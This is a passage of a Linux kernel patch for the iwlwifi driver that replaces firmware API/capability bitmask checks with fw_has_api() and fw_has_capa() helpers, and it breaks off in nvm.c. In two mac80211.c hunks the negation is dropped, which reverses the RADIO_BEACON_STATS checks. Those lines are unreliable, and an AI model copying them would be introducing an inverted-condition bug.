capa[0] will become confusing when we also have api[1] and capa[1], and it's almost certain that we'll mix up the bits and use the bits for api[1] with api[0] by accident. Avoid all this by translating the API/CAPA bits to the regular kernel test_bit() format, and also providing wrapper functions. Also use the __bitwise__ facility of sparse to check that we're testing the right one. Signed-off-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/iwl-drv.c | 26 +++++--- drivers/net/wireless/iwlwifi/iwl-fw-file.h | 67 +++++++++++---------- drivers/net/wireless/iwlwifi/iwl-fw.h | 20 +++++- drivers/net/wireless/iwlwifi/mvm/coex.c | 22 ++++--- drivers/net/wireless/iwlwifi/mvm/debugfs.c | 9 ++- drivers/net/wireless/iwlwifi/mvm/fw.c | 4 +- drivers/net/wireless/iwlwifi/mvm/mac80211.c | 47 ++++++++------- drivers/net/wireless/iwlwifi/mvm/mvm.h | 21 ++++--- drivers/net/wireless/iwlwifi/mvm/nvm.c | 8 +-- drivers/net/wireless/iwlwifi/mvm/rs.c | 10 +-- drivers/net/wireless/iwlwifi/mvm/rx.c | 4 +- drivers/net/wireless/iwlwifi/mvm/scan.c | 33 +++++----- drivers/net/wireless/iwlwifi/mvm/tx.c | 4 +- drivers/net/wireless/iwlwifi/mvm/utils.c | 2 +- 14 files changed, 161 insertions(+), 116 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-drv.c b/drivers/net/wireless/iwlwifi/iwl-drv.c index 12566c8cb275..6685259927f8 100644 --- a/drivers/net/wireless/iwlwifi/iwl-drv.c +++ b/drivers/net/wireless/iwlwifi/iwl-drv.c @@ -423,13 +423,19 @@ static int iwl_set_ucode_api_flags(struct iwl_drv *drv, const u8 *data, { const struct iwl_ucode_api *ucode_api = (void *)data; u32 api_index = le32_to_cpu(ucode_api->api_index); + u32 api_flags = le32_to_cpu(ucode_api->api_flags); + int i; - if (api_index >= IWL_API_ARRAY_SIZE) { + if (api_index >= IWL_API_MAX_BITS / 32) { IWL_ERR(drv, "api_index larger than supported by driver\n"); - return -EINVAL; + /* don't return an error so we can load FW that has more bits */ + return 0; } - capa->api[api_index] = le32_to_cpu(ucode_api->api_flags); + for (i = 0; i < 32; i++) { + if (api_flags & BIT(i)) + __set_bit(i + 32 * api_index, capa->_api); + } return 0; } @@ -439,13 +445,19 @@ static int iwl_set_ucode_capabilities(struct iwl_drv *drv, const u8 *data, { const struct iwl_ucode_capa *ucode_capa = (void *)data; u32 api_index = le32_to_cpu(ucode_capa->api_index); + u32 api_flags = le32_to_cpu(ucode_capa->api_capa); + int i; - if (api_index >= IWL_CAPABILITIES_ARRAY_SIZE) { + if (api_index >= IWL_CAPABILITIES_MAX_BITS / 32) { IWL_ERR(drv, "api_index larger than supported by driver\n"); - return -EINVAL; + /* don't return an error so we can load FW that has more bits */ + return 0; } - capa->capa[api_index] = le32_to_cpu(ucode_capa->api_capa); + for (i = 0; i < 32; i++) { + if (api_flags & BIT(i)) + __set_bit(i + 32 * api_index, capa->_capa); + } return 0; } @@ -1148,7 +1160,7 @@ static void iwl_req_fw_callback(const struct firmware *ucode_raw, void *context) if (err) goto try_again; - if (drv->fw.ucode_capa.api[0] & IWL_UCODE_TLV_API_NEW_VERSION) + if (fw_has_api(&drv->fw.ucode_capa, IWL_UCODE_TLV_API_NEW_VERSION)) api_ver = drv->fw.ucode_ver; else api_ver = IWL_UCODE_API(drv->fw.ucode_ver); diff --git a/drivers/net/wireless/iwlwifi/iwl-fw-file.h b/drivers/net/wireless/iwlwifi/iwl-fw-file.h index 5b7c0ae52f93..7efd62908e61 100644 --- a/drivers/net/wireless/iwlwifi/iwl-fw-file.h +++ b/drivers/net/wireless/iwlwifi/iwl-fw-file.h @@ -237,6 +237,8 @@ enum iwl_ucode_tlv_flag { IWL_UCODE_TLV_FLAGS_GO_UAPSD = BIT(30), }; +typedef unsigned int __bitwise__ iwl_ucode_tlv_api_t; + /** * enum iwl_ucode_tlv_api - ucode api * @IWL_UCODE_TLV_API_BT_COEX_SPLIT: new API for BT Coex @@ -259,21 +261,23 @@ enum iwl_ucode_tlv_flag { * instead of 3. */ enum iwl_ucode_tlv_api { - IWL_UCODE_TLV_API_BT_COEX_SPLIT = BIT(3), - IWL_UCODE_TLV_API_FRAGMENTED_SCAN = BIT(8), - IWL_UCODE_TLV_API_WIFI_MCC_UPDATE = BIT(9), - IWL_UCODE_TLV_API_HDC_PHASE_0 = BIT(10), - IWL_UCODE_TLV_API_TX_POWER_DEV = BIT(11), - IWL_UCODE_TLV_API_BASIC_DWELL = BIT(13), - IWL_UCODE_TLV_API_SCD_CFG = BIT(15), - IWL_UCODE_TLV_API_SINGLE_SCAN_EBS = BIT(16), - IWL_UCODE_TLV_API_ASYNC_DTM = BIT(17), - IWL_UCODE_TLV_API_LQ_SS_PARAMS = BIT(18), - IWL_UCODE_TLV_API_STATS_V10 = BIT(19), - IWL_UCODE_TLV_API_NEW_VERSION = BIT(20), - IWL_UCODE_TLV_API_EXT_SCAN_PRIORITY = BIT(24), + IWL_UCODE_TLV_API_BT_COEX_SPLIT = (__force iwl_ucode_tlv_api_t)3, + IWL_UCODE_TLV_API_FRAGMENTED_SCAN = (__force iwl_ucode_tlv_api_t)8, + IWL_UCODE_TLV_API_WIFI_MCC_UPDATE = (__force iwl_ucode_tlv_api_t)9, + IWL_UCODE_TLV_API_HDC_PHASE_0 = (__force iwl_ucode_tlv_api_t)10, + IWL_UCODE_TLV_API_TX_POWER_DEV = (__force iwl_ucode_tlv_api_t)11, + IWL_UCODE_TLV_API_BASIC_DWELL = (__force iwl_ucode_tlv_api_t)13, + IWL_UCODE_TLV_API_SCD_CFG = (__force iwl_ucode_tlv_api_t)15, + IWL_UCODE_TLV_API_SINGLE_SCAN_EBS = (__force iwl_ucode_tlv_api_t)16, + IWL_UCODE_TLV_API_ASYNC_DTM = (__force iwl_ucode_tlv_api_t)17, + IWL_UCODE_TLV_API_LQ_SS_PARAMS = (__force iwl_ucode_tlv_api_t)18, + IWL_UCODE_TLV_API_STATS_V10 = (__force iwl_ucode_tlv_api_t)19, + IWL_UCODE_TLV_API_NEW_VERSION = (__force iwl_ucode_tlv_api_t)20, + IWL_UCODE_TLV_API_EXT_SCAN_PRIORITY = (__force iwl_ucode_tlv_api_t)24, }; +typedef unsigned int __bitwise__ iwl_ucode_tlv_capa_t; + /** * enum iwl_ucode_tlv_capa - ucode capabilities * @IWL_UCODE_TLV_CAPA_D0I3_SUPPORT: supports D0i3 @@ -302,22 +306,22 @@ enum iwl_ucode_tlv_api { * @IWL_UCODE_TLV_CAPA_BT_COEX_RRC: supports BT Coex RRC */ enum iwl_ucode_tlv_capa { - IWL_UCODE_TLV_CAPA_D0I3_SUPPORT = BIT(0), - IWL_UCODE_TLV_CAPA_LAR_SUPPORT = BIT(1), - IWL_UCODE_TLV_CAPA_UMAC_SCAN = BIT(2), - IWL_UCODE_TLV_CAPA_BEAMFORMER = BIT(3), - IWL_UCODE_TLV_CAPA_TDLS_SUPPORT = BIT(6), - IWL_UCODE_TLV_CAPA_TXPOWER_INSERTION_SUPPORT = BIT(8), - IWL_UCODE_TLV_CAPA_DS_PARAM_SET_IE_SUPPORT = BIT(9), - IWL_UCODE_TLV_CAPA_WFA_TPC_REP_IE_SUPPORT = BIT(10), - IWL_UCODE_TLV_CAPA_QUIET_PERIOD_SUPPORT = BIT(11), - IWL_UCODE_TLV_CAPA_DQA_SUPPORT = BIT(12), - IWL_UCODE_TLV_CAPA_TDLS_CHANNEL_SWITCH = BIT(13), - IWL_UCODE_TLV_CAPA_HOTSPOT_SUPPORT = BIT(18), - IWL_UCODE_TLV_CAPA_RADIO_BEACON_STATS = BIT(22), - IWL_UCODE_TLV_CAPA_BT_COEX_PLCR = BIT(28), - IWL_UCODE_TLV_CAPA_LAR_MULTI_MCC = BIT(29), - IWL_UCODE_TLV_CAPA_BT_COEX_RRC = BIT(30), + IWL_UCODE_TLV_CAPA_D0I3_SUPPORT = (__force iwl_ucode_tlv_capa_t)0, + IWL_UCODE_TLV_CAPA_LAR_SUPPORT = (__force iwl_ucode_tlv_capa_t)1, + IWL_UCODE_TLV_CAPA_UMAC_SCAN = (__force iwl_ucode_tlv_capa_t)2, + IWL_UCODE_TLV_CAPA_BEAMFORMER = (__force iwl_ucode_tlv_capa_t)3, + IWL_UCODE_TLV_CAPA_TDLS_SUPPORT = (__force iwl_ucode_tlv_capa_t)6, + IWL_UCODE_TLV_CAPA_TXPOWER_INSERTION_SUPPORT = (__force iwl_ucode_tlv_capa_t)8, + IWL_UCODE_TLV_CAPA_DS_PARAM_SET_IE_SUPPORT = (__force iwl_ucode_tlv_capa_t)9, + IWL_UCODE_TLV_CAPA_WFA_TPC_REP_IE_SUPPORT = (__force iwl_ucode_tlv_capa_t)10, + IWL_UCODE_TLV_CAPA_QUIET_PERIOD_SUPPORT = (__force iwl_ucode_tlv_capa_t)11, + IWL_UCODE_TLV_CAPA_DQA_SUPPORT = (__force iwl_ucode_tlv_capa_t)12, + IWL_UCODE_TLV_CAPA_TDLS_CHANNEL_SWITCH = (__force iwl_ucode_tlv_capa_t)13, + IWL_UCODE_TLV_CAPA_HOTSPOT_SUPPORT = (__force iwl_ucode_tlv_capa_t)18, + IWL_UCODE_TLV_CAPA_RADIO_BEACON_STATS = (__force iwl_ucode_tlv_capa_t)22, + IWL_UCODE_TLV_CAPA_BT_COEX_PLCR = (__force iwl_ucode_tlv_capa_t)28, + IWL_UCODE_TLV_CAPA_LAR_MULTI_MCC = (__force iwl_ucode_tlv_capa_t)29, + IWL_UCODE_TLV_CAPA_BT_COEX_RRC = (__force iwl_ucode_tlv_capa_t)30, }; /* The default calibrate table size if not specified by firmware file */ @@ -328,13 +332,14 @@ enum iwl_ucode_tlv_capa { /* The default max probe length if not specified by the firmware file */ #define IWL_DEFAULT_MAX_PROBE_LENGTH 200 +#define IWL_API_MAX_BITS 64 +#define IWL_CAPABILITIES_MAX_BITS 64 + /* * For 16.0 uCode and above, there is no differentiation between sections, * just an offset to the HW address. */ #define IWL_UCODE_SECTION_MAX 12 -#define IWL_API_ARRAY_SIZE 1 -#define IWL_CAPABILITIES_ARRAY_SIZE 1 #define CPU1_CPU2_SEPARATOR_SECTION 0xFFFFCCCC /* uCode version contains 4 values: Major/Minor/API/Serial */ diff --git a/drivers/net/wireless/iwlwifi/iwl-fw.h b/drivers/net/wireless/iwlwifi/iwl-fw.h index cdc7f1edaed9..3e3c9d8b3c37 100644 --- a/drivers/net/wireless/iwlwifi/iwl-fw.h +++ b/drivers/net/wireless/iwlwifi/iwl-fw.h @@ -32,7 +32,7 @@ * BSD LICENSE * * Copyright(c) 2005 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -105,10 +105,24 @@ struct iwl_ucode_capabilities { u32 n_scan_channels; u32 standard_phy_calibration_size; u32 flags; - u32 api[IWL_API_ARRAY_SIZE]; - u32 capa[IWL_CAPABILITIES_ARRAY_SIZE]; + unsigned long _api[BITS_TO_LONGS(IWL_API_MAX_BITS)]; + unsigned long _capa[BITS_TO_LONGS(IWL_CAPABILITIES_MAX_BITS)]; }; +static inline bool +fw_has_api(const struct iwl_ucode_capabilities *capabilities, + iwl_ucode_tlv_api_t api) +{ + return test_bit((__force long)api, capabilities->_api); +} + +static inline bool +fw_has_capa(const struct iwl_ucode_capabilities *capabilities, + iwl_ucode_tlv_capa_t capa) +{ + return test_bit((__force long)capa, capabilities->_capa); +} + /* one for each uCode image (inst/data, init/runtime/wowlan) */ struct fw_desc { const void *data; /* vmalloc'ed data */ diff --git a/drivers/net/wireless/iwlwifi/mvm/coex.c b/drivers/net/wireless/iwlwifi/mvm/coex.c index 662fa9c09624..b4737e296c92 100644 --- a/drivers/net/wireless/iwlwifi/mvm/coex.c +++ b/drivers/net/wireless/iwlwifi/mvm/coex.c @@ -411,7 +411,7 @@ int iwl_send_bt_init_conf(struct iwl_mvm *mvm) struct iwl_bt_coex_cmd bt_cmd = {}; u32 mode; - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) + if (!fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_BT_COEX_SPLIT)) return iwl_send_bt_init_conf_old(mvm); lockdep_assert_held(&mvm->mutex); @@ -732,7 +732,7 @@ int iwl_mvm_rx_bt_coex_notif(struct iwl_mvm *mvm, struct iwl_rx_packet *pkt = rxb_addr(rxb); struct iwl_bt_coex_profile_notif *notif = (void *)pkt->data; - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) + if (!fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_BT_COEX_SPLIT)) return iwl_mvm_rx_bt_coex_notif_old(mvm, rxb, dev_cmd); IWL_DEBUG_COEX(mvm, "BT Coex Notification received\n"); @@ -762,7 +762,8 @@ void iwl_mvm_bt_rssi_event(struct iwl_mvm *mvm, struct ieee80211_vif *vif, struct iwl_mvm_vif *mvmvif = iwl_mvm_vif_from_mac80211(vif); int ret; - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) { + if (!fw_has_api(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_API_BT_COEX_SPLIT)) { iwl_mvm_bt_rssi_event_old(mvm, vif, rssi_event); return; } @@ -813,7 +814,7 @@ u16 iwl_mvm_coex_agg_time_limit(struct iwl_mvm *mvm, struct iwl_mvm_phy_ctxt *phy_ctxt = mvmvif->phy_ctxt; enum iwl_bt_coex_lut_type lut_type; - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) + if (!fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_BT_COEX_SPLIT)) return iwl_mvm_coex_agg_time_limit_old(mvm, sta); if (IWL_COEX_IS_TTC_ON(mvm->last_bt_notif.ttc_rrc_status, phy_ctxt->id)) @@ -840,7 +841,7 @@ bool iwl_mvm_bt_coex_is_mimo_allowed(struct iwl_mvm *mvm, struct iwl_mvm_phy_ctxt *phy_ctxt = mvmvif->phy_ctxt; enum iwl_bt_coex_lut_type lut_type; - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) + if (!fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_BT_COEX_SPLIT)) return iwl_mvm_bt_coex_is_mimo_allowed_old(mvm, sta); if (IWL_COEX_IS_TTC_ON(mvm->last_bt_notif.ttc_rrc_status, phy_ctxt->id)) @@ -870,7 +871,7 @@ bool iwl_mvm_bt_coex_is_ant_avail(struct iwl_mvm *mvm, u8 ant) if (ant & mvm->cfg->non_shared_ant) return true; - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) + if (!fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_BT_COEX_SPLIT)) return iwl_mvm_bt_coex_is_shared_ant_avail_old(mvm); return le32_to_cpu(mvm->last_bt_notif.bt_activity_grading) < @@ -883,7 +884,7 @@ bool iwl_mvm_bt_coex_is_shared_ant_avail(struct iwl_mvm *mvm) if (mvm->cfg->bt_shared_single_ant) return true; - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) + if (!fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_BT_COEX_SPLIT)) return iwl_mvm_bt_coex_is_shared_ant_avail_old(mvm); return le32_to_cpu(mvm->last_bt_notif.bt_activity_grading) < BT_HIGH_TRAFFIC; @@ -894,7 +895,7 @@ bool iwl_mvm_bt_coex_is_tpc_allowed(struct iwl_mvm *mvm, { u32 bt_activity = le32_to_cpu(mvm->last_bt_notif.bt_activity_grading); - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) + if (!fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_BT_COEX_SPLIT)) return iwl_mvm_bt_coex_is_tpc_allowed_old(mvm, band); if (band != IEEE80211_BAND_2GHZ) @@ -937,7 +938,8 @@ u8 iwl_mvm_bt_coex_tx_prio(struct iwl_mvm *mvm, struct ieee80211_hdr *hdr, void iwl_mvm_bt_coex_vif_change(struct iwl_mvm *mvm) { - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) { + if (!fw_has_api(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_API_BT_COEX_SPLIT)) { iwl_mvm_bt_coex_vif_change_old(mvm); return; } @@ -955,7 +957,7 @@ int iwl_mvm_rx_ant_coupling_notif(struct iwl_mvm *mvm, u8 __maybe_unused lower_bound, upper_bound; u8 lut; - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) + if (!fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_BT_COEX_SPLIT)) return iwl_mvm_rx_ant_coupling_notif_old(mvm, rxb, dev_cmd); if (!iwl_mvm_bt_is_plcr_supported(mvm)) diff --git a/drivers/net/wireless/iwlwifi/mvm/debugfs.c b/drivers/net/wireless/iwlwifi/mvm/debugfs.c index 8c17b943cc6f..ffb4b5cef275 100644 --- a/drivers/net/wireless/iwlwifi/mvm/debugfs.c +++ b/drivers/net/wireless/iwlwifi/mvm/debugfs.c @@ -493,7 +493,8 @@ static ssize_t iwl_dbgfs_bt_notif_read(struct file *file, char __user *user_buf, mutex_lock(&mvm->mutex); - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) { + if (!fw_has_api(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_API_BT_COEX_SPLIT)) { struct iwl_bt_coex_profile_notif_old *notif = &mvm->last_bt_notif_old; @@ -550,7 +551,8 @@ static ssize_t iwl_dbgfs_bt_cmd_read(struct file *file, char __user *user_buf, mutex_lock(&mvm->mutex); - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) { + if (!fw_has_api(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_API_BT_COEX_SPLIT)) { struct iwl_bt_coex_ci_cmd_old *cmd = &mvm->last_bt_ci_cmd_old; pos += scnprintf(buf+pos, bufsz-pos, @@ -916,7 +918,8 @@ iwl_dbgfs_scan_ant_rxchain_write(struct iwl_mvm *mvm, char *buf, if (mvm->scan_rx_ant != scan_rx_ant) { mvm->scan_rx_ant = scan_rx_ant; - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) + if (fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_UMAC_SCAN)) iwl_mvm_config_scan(mvm); } diff --git a/drivers/net/wireless/iwlwifi/mvm/fw.c b/drivers/net/wireless/iwlwifi/mvm/fw.c index 2f76fb23249a..eb10c5ee4a14 100644 --- a/drivers/net/wireless/iwlwifi/mvm/fw.c +++ b/drivers/net/wireless/iwlwifi/mvm/fw.c @@ -623,7 +623,7 @@ static int iwl_mvm_config_ltr(struct iwl_mvm *mvm) if (!mvm->trans->ltr_enabled) return 0; - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_HDC_PHASE_0)) + if (!fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_HDC_PHASE_0)) return iwl_mvm_config_ltr_v1(mvm); return iwl_mvm_send_cmd_pdu(mvm, LTR_CONFIG, 0, @@ -754,7 +754,7 @@ int iwl_mvm_up(struct iwl_mvm *mvm) goto error; } - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) { + if (fw_has_capa(&mvm->fw->ucode_capa, IWL_UCODE_TLV_CAPA_UMAC_SCAN)) { ret = iwl_mvm_config_scan(mvm); if (ret) goto error; diff --git a/drivers/net/wireless/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/iwlwifi/mvm/mac80211.c index 57d75d14fc80..c46c69f2440f 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/mvm/mac80211.c @@ -515,7 +515,7 @@ int iwl_mvm_mac_setup_register(struct iwl_mvm *mvm) BUILD_BUG_ON(IWL_MVM_MAX_UMAC_SCANS > HWEIGHT32(IWL_MVM_SCAN_MASK) || IWL_MVM_MAX_LMAC_SCANS > HWEIGHT32(IWL_MVM_SCAN_MASK)); - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) + if (fw_has_capa(&mvm->fw->ucode_capa, IWL_UCODE_TLV_CAPA_UMAC_SCAN)) mvm->max_scans = IWL_MVM_MAX_UMAC_SCANS; else mvm->max_scans = IWL_MVM_MAX_LMAC_SCANS; @@ -527,10 +527,10 @@ int iwl_mvm_mac_setup_register(struct iwl_mvm *mvm) hw->wiphy->bands[IEEE80211_BAND_5GHZ] = &mvm->nvm_data->bands[IEEE80211_BAND_5GHZ]; - if ((mvm->fw->ucode_capa.capa[0] & - IWL_UCODE_TLV_CAPA_BEAMFORMER) && - (mvm->fw->ucode_capa.api[0] & - IWL_UCODE_TLV_API_LQ_SS_PARAMS)) + if (fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_BEAMFORMER) && + fw_has_api(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_API_LQ_SS_PARAMS)) hw->wiphy->bands[IEEE80211_BAND_5GHZ]->vht_cap.cap |= IEEE80211_VHT_CAP_SU_BEAMFORMER_CAPABLE; } @@ -556,20 +556,20 @@ int iwl_mvm_mac_setup_register(struct iwl_mvm *mvm) NL80211_FEATURE_STATIC_SMPS | NL80211_FEATURE_SUPPORTS_WMM_ADMISSION; - if (mvm->fw->ucode_capa.capa[0] & - IWL_UCODE_TLV_CAPA_TXPOWER_INSERTION_SUPPORT) + if (fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_TXPOWER_INSERTION_SUPPORT)) hw->wiphy->features |= NL80211_FEATURE_TX_POWER_INSERTION; - if (mvm->fw->ucode_capa.capa[0] & - IWL_UCODE_TLV_CAPA_QUIET_PERIOD_SUPPORT) + if (fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_QUIET_PERIOD_SUPPORT)) hw->wiphy->features |= NL80211_FEATURE_QUIET; - if (mvm->fw->ucode_capa.capa[0] & - IWL_UCODE_TLV_CAPA_DS_PARAM_SET_IE_SUPPORT) + if (fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_DS_PARAM_SET_IE_SUPPORT)) hw->wiphy->features |= NL80211_FEATURE_DS_PARAM_SET_IE_IN_PROBES; - if (mvm->fw->ucode_capa.capa[0] & - IWL_UCODE_TLV_CAPA_WFA_TPC_REP_IE_SUPPORT) + if (fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_WFA_TPC_REP_IE_SUPPORT)) hw->wiphy->features |= NL80211_FEATURE_WFA_TPC_IE_IN_PROBES; mvm->rts_threshold = IEEE80211_MAX_RTS_THRESHOLD; @@ -619,13 +619,14 @@ int iwl_mvm_mac_setup_register(struct iwl_mvm *mvm) if (ret) return ret; - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_TDLS_SUPPORT) { + if (fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_TDLS_SUPPORT)) { IWL_DEBUG_TDLS(mvm, "TDLS supported\n"); hw->wiphy->flags |= WIPHY_FLAG_SUPPORTS_TDLS; } - if (mvm->fw->ucode_capa.capa[0] & - IWL_UCODE_TLV_CAPA_TDLS_CHANNEL_SWITCH) { + if (fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_TDLS_CHANNEL_SWITCH)) { IWL_DEBUG_TDLS(mvm, "TDLS channel switch supported\n"); hw->wiphy->features |= NL80211_FEATURE_TDLS_CHANNEL_SWITCH; } @@ -1500,7 +1501,7 @@ void __iwl_mvm_mac_stop(struct iwl_mvm *mvm) /* We shouldn't have any UIDs still set. Loop over all the UIDs to * make sure there's nothing left there and warn if any is found. */ - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) { + if (fw_has_capa(&mvm->fw->ucode_capa, IWL_UCODE_TLV_CAPA_UMAC_SCAN)) { int i; for (i = 0; i < mvm->max_scans; i++) { @@ -1572,7 +1573,7 @@ static int iwl_mvm_set_tx_power(struct iwl_mvm *mvm, struct ieee80211_vif *vif, .pwr_restriction = cpu_to_le16(8 * tx_power), }; - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_TX_POWER_DEV)) + if (!fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_TX_POWER_DEV)) return iwl_mvm_set_tx_power_old(mvm, vif, tx_power); if (tx_power == IWL_DEFAULT_MAX_TX_POWER) @@ -3102,8 +3103,8 @@ static int iwl_mvm_roc(struct ieee80211_hw *hw, switch (vif->type) { case NL80211_IFTYPE_STATION: - if (mvm->fw->ucode_capa.capa[0] & - IWL_UCODE_TLV_CAPA_HOTSPOT_SUPPORT) { + if (fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_HOTSPOT_SUPPORT)) { /* Use aux roc framework (HS20) */ ret = iwl_mvm_send_aux_roc_cmd(mvm, channel, vif, duration); @@ -3895,7 +3896,7 @@ static int iwl_mvm_mac_get_survey(struct ieee80211_hw *hw, int idx, if (idx != 0) return -ENOENT; - if (!(mvm->fw->ucode_capa.capa[0] & + if (fw_has_capa(&mvm->fw->ucode_capa, IWL_UCODE_TLV_CAPA_RADIO_BEACON_STATS)) return -ENOENT; @@ -3942,8 +3943,8 @@ static void iwl_mvm_mac_sta_statistics(struct ieee80211_hw *hw, struct iwl_mvm_vif *mvmvif = iwl_mvm_vif_from_mac80211(vif); struct iwl_mvm_sta *mvmsta = iwl_mvm_sta_from_mac80211(sta); - if (!(mvm->fw->ucode_capa.capa[0] & - IWL_UCODE_TLV_CAPA_RADIO_BEACON_STATS)) + if (fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_RADIO_BEACON_STATS)) return; /* if beacon filtering isn't on mac80211 does it anyway */ diff --git a/drivers/net/wireless/iwlwifi/mvm/mvm.h b/drivers/net/wireless/iwlwifi/mvm/mvm.h index 0173ad15ed46..255cde41d8b0 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mvm.h +++ b/drivers/net/wireless/iwlwifi/mvm/mvm.h @@ -889,14 +889,15 @@ static inline bool iwl_mvm_is_d0i3_supported(struct iwl_mvm *mvm) return mvm->trans->cfg->d0i3 && mvm->trans->d0i3_mode != IWL_D0I3_MODE_OFF && !iwlwifi_mod_params.d0i3_disable && - (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_D0I3_SUPPORT); + fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_D0I3_SUPPORT); } static inline bool iwl_mvm_is_lar_supported(struct iwl_mvm *mvm) { bool nvm_lar = mvm->nvm_data->lar_enabled; - bool tlv_lar = mvm->fw->ucode_capa.capa[0] & - IWL_UCODE_TLV_CAPA_LAR_SUPPORT; + bool tlv_lar = fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_LAR_SUPPORT); if (iwlwifi_mod_params.lar_disable) return false; @@ -913,24 +914,28 @@ static inline bool iwl_mvm_is_lar_supported(struct iwl_mvm *mvm) static inline bool iwl_mvm_is_wifi_mcc_supported(struct iwl_mvm *mvm) { - return mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_WIFI_MCC_UPDATE || - mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_LAR_MULTI_MCC; + return fw_has_api(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_API_WIFI_MCC_UPDATE) || + fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_LAR_MULTI_MCC); } static inline bool iwl_mvm_is_scd_cfg_supported(struct iwl_mvm *mvm) { - return mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_SCD_CFG; + return fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_SCD_CFG); } static inline bool iwl_mvm_bt_is_plcr_supported(struct iwl_mvm *mvm) { - return (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_BT_COEX_PLCR) && + return fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_BT_COEX_PLCR) && IWL_MVM_BT_COEX_CORUNNING; } static inline bool iwl_mvm_bt_is_rrc_supported(struct iwl_mvm *mvm) { - return (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_BT_COEX_RRC) && + return fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_BT_COEX_RRC) && IWL_MVM_BT_COEX_RRC; } diff --git a/drivers/net/wireless/iwlwifi/mvm/nvm.c b/drivers/net/wireless/iwlwifi/mvm/nvm.c index 47014241bc3c..2a6be350704a 100644 --- a/drivers/net/wireless/iwlwifi/mvm/nvm.c +++ b/drivers/net/wireless/iwlwifi/mvm/nvm.c @@ -316,8 +316,8 @@ iwl_parse_nvm_sections(struct iwl_mvm *mvm) phy_sku = (const __le16 *)sections[NVM_SECTION_TYPE_PHY_SKU].data; lar_enabled = !iwlwifi_mod_params.lar_disable && - 